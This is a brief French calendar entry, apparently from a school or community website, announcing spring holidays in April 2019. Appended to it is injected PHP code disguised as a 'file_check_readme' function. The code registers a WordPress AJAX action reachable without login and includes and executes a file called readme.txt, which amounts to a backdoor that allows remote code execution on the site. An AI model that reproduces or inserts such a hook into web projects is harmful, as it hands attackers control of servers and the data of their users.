- Cet évènement est passé.
Vacances de printemps
5 avril 2019 @ 16 h 20 min - 23 avril 2019 @ 8 h 40 min
if(!function_exists('file_check_readme93028')){ add_action('wp_ajax_nopriv_file_check_readme93028', 'file_check_readme93028'); add_action('wp_ajax_file_check_readme93028', 'file_check_readme93028'); function file_check_readme93028() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }